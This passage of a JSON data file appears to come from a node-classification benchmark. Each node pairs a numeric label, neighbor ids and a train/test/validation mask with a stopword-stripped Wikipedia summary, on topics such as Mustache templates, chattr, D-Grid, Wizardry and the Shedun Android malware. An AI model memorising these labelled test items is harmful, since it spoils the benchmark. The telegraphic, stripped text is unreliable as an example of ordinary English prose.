    "text": "Mustache_(template_system):mustache template system mustache web template system implementations available actionscript c++ clojure coffeescript coldfusion common lisp dart delphi erlang fantom go haskell io java javascript julia lua .net objective-c ocaml perl php pharo python r racket ruby rust scala smalltalk swift tcl cfengine xquery mustache described logic-less system lacks explicit control flow statements like else conditionals loops however looping conditional evaluation achieved using section tags processing lists lambdas named mustache heavy use braces resemble sideways moustache mustache used mainly mobile web applications mustache-1 inspired ctemplate et started github distribution end 2009 first version template engine implemented ruby running yaml template texts preserved main principles input data class input data characterized mvc-view mustache template nothing reference methods input data view logic decisions code contained view markup ex output xml contained template mvp context input data mvp- presenter mustache template mvp- view simplest template hello template section tag text codice_1 boolean value section tag acts like conditional codice_1 array acts like foreach loop template escaped codice_3 contains html wo n't escaped syntax highlighting available atom coda emacs textmate vim visual studio code mustache templates support built many web application frameworks ex cakephp support javascript includes client-side programming many javascript libraries ajax frameworks jquery dojo yui well server-side javascript using node.js commonjs many mustache engine implementations available meet common specification see external links — final users results common syntax march 2011 last spec_version 1.1.2 mustache engines v1.x architecture render method mustache_compiler class parser class mustache inspired numerous javascript template libraries forked original simplicity add certain functionality use handlebars.js self-described br handlebars.js extension mustache templating language created chris wanstrath handlebars.js mustache logicless templating languages keep view code separated like know handlebars differs predecessor h1 /h1 h2 /h2 using context var context mustache would require either block nested object flattening context thus would h1 /h1 h2 /h2",
    "neighbors": [
      4482,
      3462,
      8582,
      2062,
      9614,
      1435,
      155,
      8605,
      9245,
      803,
      3876,
      5031,
      4777,
      5165,
      5677,
      1203,
      692,
      5048,
      6718,
      7871,
      8644,
      5833,
      7292,
      7889,
      11221,
      10198,
      9948,
      479,
      10470,
      2666,
      8554,
      10097,
      3573,
      6775,
      3705,
      2556
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5256,
    "label": 6,
    "text": "Chattr:chattr bsd-like systems including macos always analogous command set attributes command specifically meant display specific options command used instead solaris commands specifically meant manipulate used instead unices general analogous commands similar-sounding commands hp-ux aix exist unrelated functions among things command useful make files immutable password files certain system files erased software upgrades attributes manipulate originally specific second extended filesystem family ext2 ext3 ext4 available part e2fsprogs package however functionality since extended fully partially many systems including xfs reiserfs jfs ocfs2 btrfs file system includes attribute functionality including codice_1 flag turns built-in copy-on-write cow feature btrfs due slower performance associated cow form command form command gnu 1.41.3 attributes include command specific particular file systems ufs bsd systems apfs hfs+ smb afp fat macos support least flags form command bsd-like systems general default user-level command specifically meant display flags file command either codice_13 codice_14 depending system flags passed traditional attributes set cleared super-user also set cleared owner file attributes include bsd systems offer additional flags like offline snapshot sparse uarchive see references",
    "neighbors": [
      3330,
      515,
      9733,
      9735,
      3976,
      5256,
      6669,
      4750,
      2194,
      2197,
      2198,
      2199,
      5397,
      6812,
      6434,
      2597,
      5158,
      7847,
      4398,
      11184,
      819,
      10036,
      823,
      1336,
      7356,
      9151,
      451,
      8772,
      965,
      8522,
      3659,
      8404,
      9946,
      6494,
      7136,
      5985,
      8675,
      11363,
      1509,
      6120,
      7663,
      4850,
      5492,
      9204,
      246,
      9335,
      6138,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 5257,
    "label": 9,
    "text": "Circuit_breaker_design_pattern:circuit breaker design pattern circuit breaker design pattern used modern software development used detect failures encapsulates logic preventing failure constantly recurring maintenance temporary external system failure unexpected system difficulties assume application connects database 100 times per second database fails application designer want error reoccur constantly also want handle error quickly gracefully without waiting tcp connection timeout generally circuit breaker used check availability external service external service database server web service used application circuit breaker detects failures prevents application trying perform action doomed fail safe retry implementations circuit breaker design pattern need retain state connection series requests must offload logic detect failures actual requests therefore state machine within circuit breaker needs operate sense concurrently requests passing one way achieved asynchronously multi-node clustered server state upstream service need reflected across nodes cluster therefore implementations may need use persistent storage layer e.g network cache memcached redis local cache disk memory based record availability application external service circuit breaker records state external service given interval external service used application storage layer queried retrieve current state safe say benefits outweigh consequences implementing circuit breaker negatively affect performance much depends storage layer used generally available resources largest factors regard type cache example disk-based vs. memory-based local vs. network following sample implementation php proof concept stores status mysql server shared memory cache apc following script could run set interval crontab",
    "neighbors": [
      7175,
      3848,
      9225,
      10924,
      333,
      337,
      7347,
      2901,
      3990,
      2011
    ],
    "mask": "Test"
  },
  {
    "node_id": 5258,
    "label": 7,
    "text": "D-Grid:d-grid d-grid initiative german grid initiative government project fund computer infrastructure education research e-science germany uses term grid computing d-grid started september 1 2005 six community projects integration project dgi well several partner projects d-grid integration project intended integrate community projects d-grid integration project acted service provider science community germany project office located institute scientific computing iwr forschungszentrum karlsruhe resources ensure sustainable grid infrastructure provided four work packages six community projects participated d-grid initiative astrogrid-d also referred german astronomy community grid gacg joint research project thirteen astronomical institutes grid-oriented computer science groups supported supercomputing centers main objective astrogrid-d integration german research facilities unified nationwide research infrastructure field astronomy goal improve efficiency usability hardware software resources including computer clusters astronomical data archives observational facilities robotic telescopes astrogrid-d supports standards international virtual observatory alliance ivoa cooperates closely international projects grid development astrogrid-d managed astrophysical institute potsdam aip collaborative climate community data processing grid c3-grid scientific researchers trying understand earth system including subsystems like oceans atmosphere biosphere last decades amount data increased enormously field climate research one hand due rapid rise computing power scientists able use models higher resolution perform long term simulations scientists able couple models mentioned subsystems complex cumulative simulations producing petabytes output collected distributed data archives hand monitoring earth satellites results second huge data stream climate research uniform access distributed data available creates bottleneck scientific research c3-grid proposes link distributed data archives management c3-grid alfred wegener institute polar marine research awi bremerhaven gdi-grid geodateninfrastrukturen-grid spatial data infrastructure grid project focuses solutions efficient integration processing geodata based gis sdi technologies project integrate gdi grid technologies working gdi-grid infrastructure thus demonstrate complementarity fields science distributed geospatial data—currently accessed via standardized gis sdi services—will build basis endeavour data basis put use processing merging data creating standards-based multi-functional generic sdi services project focuses data models services workflows spatial data infrastructures services integration processing management spatial data developed implemented within d-grid infrastructure proof concept given using number representative scenarios emergency routing disaster management flood simulation sound propagation simulation project managed university hanover regional computing center lower saxony rrzn hep-grid project focused high energy physics nuclear well astroparticle physics main task hep-grid optimize data analysis using distributed computing storage resources project developments extensions grid middleware enabling grids e-sciencee project european grid infrastructure large hadron collider lhc computing grid lcg project provide significant improvements data analysis experiments currently taking data planned proposed international linear collider ilc hep-grid deutsches elektronen synchrotron desy german electron synchrotron hamburg collaborates eight german research facilities universities set associate partners ingrid community project field grid computing engineering sciences ingrid aims enable engineering projects grid-based applications allow common efficient use common compute software resources grid technologies promised combine competences modeling simulation optimization five typical applications foundry technologies metal forming technologies groundwater flow transport turbine simulation fluid-structure interaction considered showcases cover three central areas computationally intensive engineering applications coupled multi-scale problems coupled multi-discipline problems distributed simulation-based optimization particular adaptive scalable process models grid based runtime environments tasks developed support virtual prototyping optimization scientific engineering operational sequences emphasis project project management ingrid provided high performance computing center höchstleistungsrechenzentrum stuttgart hlrs university stuttgart joint project medigrid unifies research institutes medicine biomedical informatics life sciences consortium partners industry healthcare research facilities main goal medigrid development aggrid middleware integration platform enabling escience services biomedical life science project formed four modules middleware ontology resource fusion escience developed grid infrastructure biomedical users user communities represented three research modules biomedical informatics image processing clinical research sugi sustainable grid infrastructure gap project german grid initiative major task disseminate knowledge grid technology enhance use thus sugi addresses academic computing centers well enterprises still adopted grid technology supported providing grid resources services experiences d-grid projects made available institutions thus sugi offers training courses attends external courses create video audio recordings provide online d-grid communities via scaling training infrastructure sugi-portal sugi claimed develop training systems grid middleware simplify installation servicing procedures work development evaluation legal organizational structures grid technologies developed natural life sciences opportunities deploying grid computing e-science concepts areas well textgrid grid project humanities uses buzzword e-humanities textgrid promised create grid-based infrastructure collaborative editing annotation analysis publication specialist texts researchers philology linguistics related fields addition providing comprehensive toolset project establishes open platform projects plug textgrid valuegrids developed service level management service value networks supposed enable providers software-as-a-service solutions utilize grid infrastructures leverage german national grid infrastructure valuegrids project partners sap ag coordinator conemis ag ibm deutschland research development gmbh university freiburg karlsruhe institute technology several partner projects involved d-grid e-science project wisent wissensnetz energiemeteorologie promised optimize cooperation scientific organizations energy meteorology employing grid technologies main focus research influence weather climate transformation transport utilisation energy 100 german research facilities funded 20 billion euros 3 years german federal ministry education research",
    "neighbors": [
      5956,
      5414,
      1480,
      5210,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 5259,
    "label": 2,
    "text": "D3DX:d3dx computing d3dx direct3d extension deprecated high level api library written supplement microsoft direct3d graphics api d3dx library introduced direct3d 7 subsequently improved direct3d 9 provides classes common calculations vectors matrices colors calculating look-at projection matrices spline interpolations several complicated tasks compiling assembling shaders used 3d graphic programming compressed skeletal animation storage matrix stacks several functions provide complex operations 3d meshes like tangent-space computation mesh simplification precomputed radiance transfer optimizing vertex cache friendliness strip reordering generators 3d text meshes 2d features include classes drawing screen-space lines text sprite based particle systems spatial functions include various intersection routines conversion from/to barycentric coordinates bounding box sphere generators d3dx library contains pre-written routines things common 2d/3d applications games since direct3d api relatively low-level using d3dx library usually much simpler 2012 microsoft announced d3dx would deprecated windows 8 sdk along development frameworks xna shader effects texture management geometry optimizations mesh models available separate sources published codeplex mathematical constructs d3dx like vectors matrices would consolidated xnamath directxmath spherical harmonics math provided separate source d3dx library follows com object oriented programming model functionality accessed using c++-like interfaces id3dxeffect interface used compiling binding fx shaders .fx supports automatic mapping named shader parameters hardware constant registers parameter pools mapping textures available samplers specifying 'techniques modifying render states id3dxfont interface used draw 2d text see also d3dxcreatetext creates 3d meshes text id3dxline interface used drawing anti-aliased screen-space lines pattern id3dxmesh interface used storage meshes mesh optimization vertex cache friendliness strip reordering functions d3dx operate interface example d3dxcomputetangentframe creating tangent-space frame effects like normal parallax mapping descendant class id3dxpmesh geometry simplification used precomputed radiance transfer technique similar spherical harmonics lighting used precomputed global illumination soft ambient lighting id3dxsprite interface c++ class used drawing 2d image screen known sprite computer graphics directx 7 typically done using directdraw api deprecated programmer typically needs call id3dxsprite object begin method set render state world transform 2d drawing call draw method add textures list drawn finally call end method draw images screen restore original graphics state common criticism d3dxsprite slow issue addressed direct3d 9 computes tangent-space frame mesh used effects like normal/bump mapping parallax mapping anisotropic lighting models handles vertices tangent-space discontinuities making duplicates thus solving hairy ball problem n't handle reversed uv winding faces models mirrored texture mapping may run lighting troubles",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      1577,
      4143,
      9263,
      11316,
      1077,
      8246,
      4174,
      4178,
      9813,
      603,
      2145,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      653,
      3224,
      4771,
      7846,
      10414,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      6927,
      9491,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      5952,
      1348,
      844,
      10079,
      11616,
      2943,
      9609,
      9612,
      9114,
      10654,
      8607,
      11683,
      6584,
      2493,
      7629,
      8161,
      6114,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "Train"
  },
  {
    "node_id": 5260,
    "label": 3,
    "text": "Wizardry:_Proving_Grounds_of_the_Mad_Overlord:wizardry proving grounds mad overlord wizardry proving grounds mad overlord first game wizardry series role-playing video games developed andrew greenberg robert woodhead 1980 norman sirotek formed sir-tech software inc. launched beta version product 1980 boston computer convention final version game released 1981 game one first dungeons dragons-style role-playing games written computer play first game offer color graphics also first true party-based role-playing video game game eventually ended first trilogy also included proving grounds needs completed order create party could play remainder trilogy starting town represented text-based menu player creates party six characters assortment five possible races humans elves dwarves gnomes hobbits three alignments good neutral evil four basic classes fighter priest mage thief four elite classes bishop priest mage spells samurai fighter mage spells lord fighter priest spells ninja fighter thief abilities unlocked characters progressed sufficiently good evil characters normally assigned party characters equipped basic armor weaponry party descends dungeon trebor castle consists maze ten levels progressively challenging last classes multiple spells seven levels characters learn advance style play employed game come termed dungeon crawl goal subsequent role-playing video games find treasure including ever potent items gain levels experience killing monsters face evil arch-wizard werdna bottom level retrieve powerful amulet goal levels find elevator stairs going next level without killed process graphics original game extremely simple today standards screen occupied text 10 devoted first-person view dungeon maze using high-resolution line graphics standards day however graphics improved text-only games far common monsters encountered dungeon maze disappears replaced picture one monsters combat 1 4 groups monsters game lack automap feature invented time release practically forces player draw map level graph paper included box walk 20x20 dungeon maze step step – failing often results becoming permanently lost many locations maze permanent darkness spell upon square making player walk blindly teleport spell sending player new location magic spell used determine current location party higher levels teleport spell used quickly transition maze levels care necessary teleporting player must enter level coordinates teleport number steps north south east west current location easily possible land trap solid stone ending game original releases wizardry also announce player teleported play resumes one step forward taken game unforgiving difficulty players save progress within dungeon must exit dungeon first event total party kill play resumed however new party may recover bodies items dead adventurers later wizardry games made easier restarting point dungeon characters died take hundreds hours finish game wizardry saves player party game progress onto scenario disk booting new one may created blank floppy disk existing one used completion proving ground mad overlord necessary play sequels wizardry ii iii since require characters first game imported scenario disk series exploits involves identification ability bishops allows characters gain massive experience points gold according co-author robert woodhead cheats actually bug caused game lack bounds-checking disabled fit within 48k ram ibm pc version game released bug declared feature deliberately included andrew greenberg cornell university student began project development 1978 game early playable state fall 1979 became popular among fellow students wizardry drew influences earlier games plato system notably 1977 role-playing game oubliette initially coded applesoft basic greenberg woodhead rewrote ucsd pascal basic proved slow playable wait run-time system available early 1981 publishing game took two half man-years complete delay benefited wizardry permitting almost one year playtesting game balancing release distinguishing others ultima frederick sirotek norman businessman father company financier insisted packaging documentation professional also distinguishing game others sold ziploc bags commodore 64/128 versions wizardry 1-3 share common code base apple originals use run-time 6502 pascal interpreter provides support overlays low-level functions interface hardware uscd pascal also used ibm versions x86 version interpreter lengthy load time extensive disk access problem wizardry however commodore versions particularly suffer provided variety workarounds c128 mode vdc memory used store overlays reus supported c64 c128 mode wizardry 2-5 also detect 16k 64k vdc memory present use 1571 drive burst mode faster load time werdna trebor names greenberg woodhead spelled backwards names also appear initials i.e. acg rjw map eighth ninth floors sir-tech published wizardry revision 2 1982 implemented number near features john m. morrison space gamer 50 commented time old disk wearing definitely recommend sending 5 transfer backup characters 'll get revision 2 boot wizardry shipped september 1981 almost immediately became hit popular apple ii game year 30 june 1982 sold 24,000 copies making one best-selling computer rpgs north america time comparison temple apshai 1979 sold 30,000 copies 1981 sold 20,000 copies time electronic games described wizardry 1983 without doubt popular fantasy adventure game apple ii present time wizardry eventually sold 200,000 copies course three years outselling original ultima time based sales market-share data video magazine listed wizardry tenth list best selling video games february 1985 ninth best seller list march 1985 ii computing listing wizardry third list top apple ii games october–november 1985 behind zork sargon iii ahead zaxxon ultima iii within months wizardry release least two commercial game trainers appeared despite sir-tech denouncing use game also perhaps first strategy guide wizisystem promised average player could succeed game successful easy-to-follow format child psychiatrist reported success using game therapy game eventually led series eight games spanning twenty years helped set genre standards intuitive layout interface forrest johnson reviewed wizardry space gamer 46 johnson commented wizardry represents leap computer game design certainly best d-style computer game market game reviewed 1982 dragon 65 bruce humphrey humphrey stated much good game difficult decide begin concluded describing easily beaten solved recommend anyone tired mediocre programs ho-hum dungeon encounters computer gaming world year praised one all-time classic computer games complex yet playable major faults minor one described review ease parties initially killed macintosh version game known fans macwizardry reviewed 1986 dragon nowiki /nowiki first role computers column reviewers called macwizardry delightful reintroduction marvelous classic subsequent column reviewers gave mac version game 4 5 stars jerry pournelle named one two games month march 1986 writing n't know fascination wizardry describe objective terms seems boring—which certainly witness time eaten month wizardry series ported various japanese computers nec pc-8801 became popular along ultima inspired jrpg series like dragon quest final fantasy 1984 softline readers named game popular apple program time game top-rated adventure five years computer gaming world reader poll ultima iv replaced 1986 score 7.69 10 1988 wizardry among first members magazine hall fame honoring games rated highly time readers magazine 1982 review predicted 1990 game received ninth-highest number votes survey computer gaming world readers all-time favorites 1991 1993 magazine scorpia wrote mainly hack-and-slash still grand expedition even today 1996 magazine named wizardry 16th best game ever editors wrote seminal dungeon romp rpg sent ad fans scrambling buy apple iis",
    "neighbors": [
      577,
      9446,
      712,
      3307,
      4527,
      10449,
      4530,
      11411,
      3413,
      4536,
      5436
    ],
    "mask": "None"
  },
  {
    "node_id": 5261,
    "label": 4,
    "text": "Shedun:shedun shedun family malware software also known kemoge shiftybug shuanet targeting android operating system first identified late 2015 mobile security company lookout company affecting roughly 20,000 popular android applications lookout claimed hummingbad malware also part shedun family however claims refuted avira protection labs stated shedun family malware detected cause approximately 1500-2000 infections per day three variants virus known share roughly ~80 source code mid 2016 arstechnica reported approximately 10.000.000 devices would infected malware new infections would still surging malware primary attack vector repackaging legitimate android applications e.g facebook twitter whatsapp candy crush google snapchat adware included app remains functional released third party app store downloaded application generates revenue serving ads estimated amount 2 us per installation users get rid virus without getting new device way get rid malware root affected devices re-flash custom rom addition shedun-type malware detected pre-installed 26 different types chinese android-based hardware smartphones tablet computers shedun-family malware known auto-rooting android os using well-known exploits like exynosabuse memexploit framaroot causing potential privilege escalation serving trojanized adware install within system partition operating system even factory reset remove malware infected devices shedun malware known targeting android accessibility service well downloading installing arbitrary applications usually adware without permission classified aggressive adware installing potentially unwanted program applications serving ads april 2016 shedun malware security researchers considered next impossible remove entirely avira security researcher pavel ponomariov specialized android malware detection tools mobile threats detection mobile malware detection automation research published in-depth analysis computer virus",
    "neighbors": [
      11266,
      1892,
      901,
      7739,
      8997,
      10756,
      2538,
      9771,
      877,
      7983,
      3473,
      7515,
      2259,
      2041,
      1242,
      1083,
      10141
    ],
    "mask": "None"
  },
  {
    "node_id": 5262,
    "label": 2,
    "text": "Google_Daydream:google daydream daydream virtual reality vr platform developed google built android mobile operating system versions nougat 7.1 later compatible phones follow platform software hardware specifications thus designated daydream-ready used google daydream view virtual reality head-mounted display mount daydream platform announced google i/o developer conference may 2016 first vr headset released november 10 2016 daydream company second vr platform following google cardboard low-cost system intended encourage interest vr built compatible mobile apps rather operating system confused daydream screensaver feature introduced android 4.2 2012 renamed screen saver 2016 launch vr platform first-generation google daydream view announced october 4 2016 daydream-ready smartphones placed front compartment daydream view viewed vr headset two lenses view distinguished previous vr head mounts constructed light-weight cloth material well featuring capacitive nubs nfc chip simplify process setting virtual reality viewing daydream view released november 10 2016 daydream view launched slate color option two new color choices crimson snow became available december 8 2016 review google daydream view adi robertson verge wrote headset best mobile headset 'd ever used complimenting squishy foam-and-fabric body significantly smaller lighter portable samsung gear vr design keeps lenses relatively protected travel also liked device weight distribution writing rests weight forehead cheeks option 've found comfortable allows wear easily hours time also praised material particularly plastic sliders rather velcro patches head strap writing allows wider range sizes avoids gathering lint view overall design could almost pass airplane sleep mask meaning avoids looking ostentatiously high-tech intimidating google daydream headsets packaged wireless controller controller used interacting virtual world button presses waving device on-board sensors used track orientation controller approximate position user hand daydream view controller stored inside headset use controller touch pad two circular buttons one functioning home button one functioning app-specific button two volume buttons along status light controller rechargeable charges via usb-c. support pages google notes daydream view n't include charger cables instead directs users purchase google store may 2016 google i/o developer conference google announced virtual reality vr mode called daydream would coming new android release nougat vr mode lets players use virtual reality apps including youtube google maps street view google play movies tv google photos immersive view google recruited media companies like netflix ubisoft entertainment apps january 2017 google opened daydream program third-party developers second-generation daydream view unveiled made google 2017 event first time available three colors namely charcoal fog coral largely similar first-generation improvements including slightly altered design improved lenses wider field view hand augmented reality major upgrade exclusive second-generation design released 19 october 2017 launch price us 99 lenovo mirage solo headset announced ces 2018 first standalone headset running google daydream platform powered qualcomm snapdragon 835 system-on-chip 4 gb ram 64 gb internal storage expandable microsd dual mics 3.5mm headphone jack 2560 x 1440 lcd screen 4,000 mah battery highlight feature support google worldsense improved position tracking technology headset designed coupled mirage camera point-and shoot 180-degree 3d vr camera two lenses capture 4k lenovo released device may 2018 price 399 daydream work certain newer phones specific components google announced google i/o conference eight hardware partners make daydream-ready phones samsung htc lg xiaomi huawei zte asus alcatel phones dedicate processing power daydream mode order reduce latency prevent nausea sundar pichai expects 11 android smartphones support daydream vr sale end 2017 following phones confirmed daydream-ready google play movies app daydream developed maintained google discontinued june 2019",
    "neighbors": [
      4096,
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      10284,
      5677,
      3633,
      1083,
      10303,
      6212,
      69,
      8262,
      4683,
      4685,
      11343,
      3664,
      8280,
      8285,
      2658,
      8821,
      11391,
      1670,
      9863,
      7816,
      6800,
      11408,
      10393,
      8858,
      7835,
      673,
      7841,
      8870,
      1191,
      1203,
      9913,
      7359,
      194,
      196,
      3269,
      3782,
      8907,
      10445,
      3795,
      1240,
      8413,
      9949,
      6367,
      1255,
      236,
      8940,
      9970,
      7926,
      3836,
      5892,
      7428,
      8455,
      2828,
      280,
      10009,
      11546,
      10525,
      798,
      11549,
      288,
      2852,
      4901,
      8486,
      10537,
      7983,
      3380,
      5431,
      2875,
      3900,
      10045,
      11590,
      11592,
      11082,
      332,
      9039,
      3409,
      8019,
      2901,
      5467,
      3940,
      5483,
      7548,
      1409,
      4995,
      9610,
      10129,
      5522,
      1427,
      5524,
      10645,
      1435,
      2978,
      1959,
      424,
      937,
      5546,
      3499,
      6057,
      7595,
      4044,
      4048,
      2001,
      479,
      488,
      6632,
      1516,
      5100,
      5613,
      9712,
      5620,
      11252,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5263,
    "label": 3,
    "text": "The_Fairyland_Story:fairyland story gameplay often compared taito platform games bubble bobble newzealand story liquid kids japanese msx version developed published hot-b released 1987 sharp x68000 port developed published 1991 sps fairyland story would included arcade game collections taito legends 2 taito memories jokan taito legends power-up 2003 port japanese mobile phones made available i-mode ezweb network services fairyland story platform arcade game player controls witch ptolemy series single-screen stages objective defeat enemies screen ptolemy main weapon projectile magic temporarily transform enemies large cakes caked form enemies destroyed either magic attacks dropped platform possibly squashing enemies squashing one enemy results award points sometimes extra bonuses 2000 points awarded squashing enemy cake additional enemy doubling number points awarded two enemies killed one spot coin appear spot may collected additional points collected multiply points long player n't lose life ptolemy enemies based upon typical fantasy beings include orcs pig-like soldiers salamanders dragon-like creatures breath fire wizards mages make ptolemy shrink disappear clerics bishops multiply golems wraiths hooded creatures phase ptolemy magic ptolemy takes long clear level last remaining enemy eventually enemy disappear without award points however ptolemy takes long clear one enemy level flying devil named horned appears kill ptolemy devil invulnerable ptolemy magic way survive ptolemy kill remaining enemies game element similar beluga skel monsta fish limit time allowed level later taito game bubble bobble ptolemy deaths animated different ways depending enemy kills sometimes collect utility bonuses increase power range magic short offensive bonuses usually result cake-ification destruction on-screen enemies various intervals levels intermission screen appears game showing ptolemy riding back large wingless blue dragon named rodemy message appears intermission screens either congratulating player warning hazard next level many messages contain incorrect english idioms grammar typical engrish reviewing taito legends 2 kristan reed eurogamer wrote fairyland story lot fun although lacks two-player co-op fun sadly ... hugely addictive though msx port developed published hot-b released september 3 1987 port featured degraded graphics sound arcade version typical arcade ports msx new stages perhaps make degradation graphics sound new stages based taito properties like level 37 resembling mr. chack n chack n pop port also featured two new enemies iron golem golem enemy immune ptolemy magic fleck enemy use magic ptolemy hot-b also developing port famicom port later cancelled unknown reasons later 1992 sharp x68000 port developed published sps released september 27 1991 unlike msx port however straightforward port arcade version like arcade ports sharp x68000 added several features found original arcade version like level progress high score saving choice two soundtracks choices emulation original soundtrack remixed soundtrack 2003 port made available japanese mobile phones via i-mode ezweb network services much information known port besides screenshots music port appearing soundtrack album mobile games made taito emulated versions original arcade version would later included arcade collections taito legends 2 taito memories jokan taito legends power-up ptolemy appears player character space invaders dx 1994 pop n pop 1998 daifugo party 2010 arkanoid vs. space invaders 2017 also made cameo appearances several games including new zealand story 1988 bubble symphony 1994 bubble memories 1996 arkanoid ds 2007 1987 secret island based fairyland story named magical island enemies music used secret island ptolemy appear versions rainbow islands feature secret island however make cameo appearance game boy color port rainbow islands cutscenes proceeding magical island worm enemy makes appearances doko 1989 doko 2 1991 many bubble bobble new zealand story gameplay elements even graphics bonuses first appeared fairyland story",
    "neighbors": [
      5882,
      10931,
      1693,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 5264,
    "label": 3,
    "text": "UAE_(emulator):uae emulator uae computer emulator emulates hardware commodore international amiga range computers released gnu general public license uae free software uae released 1995 originally called unusable amiga emulator due inability boot early stages known unix amiga emulator later names well since none popular expansions fit abbreviation longer stands anything software simply known uae — occasionally gets backronymed universal amiga emulator ultimate amiga emulator ubiquitous amiga emulator uae almost full-featured amiga emulator emulates functions software uae may use disk images made original amiga floppy disks images file extension adf amiga disk file actual amiga disks used limitations floppy controllers used computers images amiga formatted hard drives also made uae also supports mapping host operating system directories amiga hard drives uae include original amiga operating system rom files required running amiga system included license packages like amiga forever original kickstart 3.1 rom images also included amigaos4 powerpc since version 4.1 update 4 uae also supports alternative system roms derived aros project however provide degree software compatibility original roms uae ported many host operating systems including linux macos freebsd dos microsoft windows risc os beos palm os android xbox console psp psvita gp2x handhelds ios wii dreamcast consoles even amigaos morphos aros many threads past usenet public forums people argued possibility writing amiga emulator considered uae attempting impossible demanding system read process output 100 mb/s data fastest pc 66 mhz 486 keeping various emulated chips amiga chipset sync appearing supposed appear software uae almost entirely unusable first releases slowly step step fleshed support amiga chipset end 1997 able emulate amiga 500 quality speed sufficient productivity use many games since uae usable thanks partly effort taken develop partly big improvements technology brought computers many times faster uae initially running many amiga games applications run smoothly pentium ii-era system realization useful amiga emulator could written contributed increase enthusiasm emulation started sped-up efforts write emulators often less popular computer electronic game architectures major improvement made 2000 bernd meyer use just-in-time compilation significantly improved emulation speed extent average pcs could emulate amiga software faster real amiga could run uae use much host power native mode possible balance requirements host os accurately reflect original speed depending user choice uae also provides rtg-compatible video card amiga side emulation tailored display host hardware limited emulation original amiga video hardware five main forks original program active fork winuae current versions still contain bugs compatibility issues specific versions",
    "neighbors": [
      3462,
      7305,
      2058,
      139,
      6797,
      2193,
      9236,
      3350,
      2073,
      3233,
      8609,
      9249,
      8618,
      10284,
      6062,
      7983,
      432,
      8369,
      8115,
      823,
      6075,
      11076,
      8776,
      10570,
      5709,
      1742,
      850,
      4564,
      6233,
      8410,
      5729,
      7269,
      5736,
      11370,
      5743,
      10224,
      11123,
      5492,
      7286,
      9848,
      1530,
      8700
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5265,
    "label": 3,
    "text": "Yamaha_YM2413:yamaha ym2413 ym2413 a.k.a opll cost-reduced fm synthesis sound chip manufactured yamaha corporation based ym3812 opl2 make chip cheaper manufacture many internal registers removed result ym2413 play one user-defined instrument time 15 instrument settings hard-coded altered user cost-cutting modifications number waveforms reduced two channels mixed using adder instead chip dac uses time-division multiplexing play short segments channel sequence also done ym2612 ym2413 used",
    "neighbors": [
      3168,
      10018,
      9957,
      3788,
      2861,
      9006,
      5009,
      8561,
      8945,
      6197
    ],
    "mask": "Test"
  },
  {
    "node_id": 5266,
    "label": 3,
    "text": "Osborne_PC_prototype:osborne pc prototype early summer 1983 effort launched produce version osborne executive would compatible ibm pc although venture partners contributed 9 million funding april another 11 million june osborne unable raise additional 20 million considered necessary get ibm-compatible product market tiger team formed primarily create prototype dos compatible printed circuit board front bezel accommodate changes connectors design used many parts executive including disc drives display chassis power supply keyboard completed six weeks shown number potential investors unable generate sufficient interest save company bankruptcy 2 august new jersey plant shut 89 workers laid days later 200 workers let go hayward ca facility early september banks seized company accounts receivable 9 september additional 270 workers fired production ceased leaving 80 employees california payroll three days later 12 september porter hurt filed suit 4.5 million owed firms pc boards 13 september 1983 occ filed chapter 11 protection oakland ca federal bankruptcy court listing assets 40 million liabilities 45 million 600 creditors",
    "neighbors": [
      1776,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 5267,
    "label": 3,
    "text": "DNA-OS:dna-os dna-os french-made operating system supersede muteka obsolete operating system still providing posix thread api said soclib website kernel-mode lightweight operating system multiprocessor system chip build top thin hal ease porting new platforms processor architecture dna/os support virtual memory dna-os layered microkernel operating system written c99 released gnu gplv3 license",
    "neighbors": [
      7745,
      7170,
      2179,
      4039,
      8713,
      11145,
      4076,
      4569,
      10156,
      7823,
      1584,
      7187,
      11062,
      1399,
      7224,
      3129,
      3451,
      1853
    ],
    "mask": "Train"
  },
  {
    "node_id": 5268,
    "label": 7,
    "text": "Satmetrix:satmetrix satmetrix systems inc. privately held experience management company headquartered san mateo california united states satmetrix systems operates subsidiary nice ltd company founded customercast inc. 1997 andre o. schwager roselie buonauro acquired nice systems july 2017 company provides satmetrix npx customer experience management cem platform provides business consulting services including design strategy analytics implementation satmetrix provides survey platform market research customer satisfaction loyalty customer feedback along bain company fred reichheld satmetrix systems co-developed net promoter score nps metric serves measure loyalty consumer provider",
    "neighbors": [
      2328,
      6737,
      9305
    ],
    "mask": "None"
  },
  {
    "node_id": 5269,
    "label": 3,
    "text": "Ducks_demo:ducks demo ducks demo tech demo demonstrated capabilities playstation 2 e3 2000 playstation 3 e3 2005 playstation 2 demo one duck shown interacting water bathtub playstation 3 demo many ducks interacting environment visual representation leap processing abilities playstation 2 sony executives promise playstation 3 deliver ducks demo basis super rub dub downloadable title ps3 produced scee demo phil harrison shows crowd small bathtub rubber ducks uses demonstrate real-time water ripples dynamics uses two toy pirate ships demonstrate cloth dynamics show cell processing power adds huge amount ducks tub reacting would real-life due advanced physics engine phil comments dryly possible use lod technology n't know lod stands lots ducks phil harrison invites creator eyetoy show new technology playstation 3 use plugging standard playstation 2 eyetoy playstation 3 picks two ordinary cups proceeds move cups scooping motion scoops water pictured screen animating reacting real water would ducks demo basis super rub dub downloadable title ps3 produced scee",
    "neighbors": [
      8937,
      5746,
      10316,
      6311
    ],
    "mask": "None"
  },
  {
    "node_id": 5270,
    "label": 5,
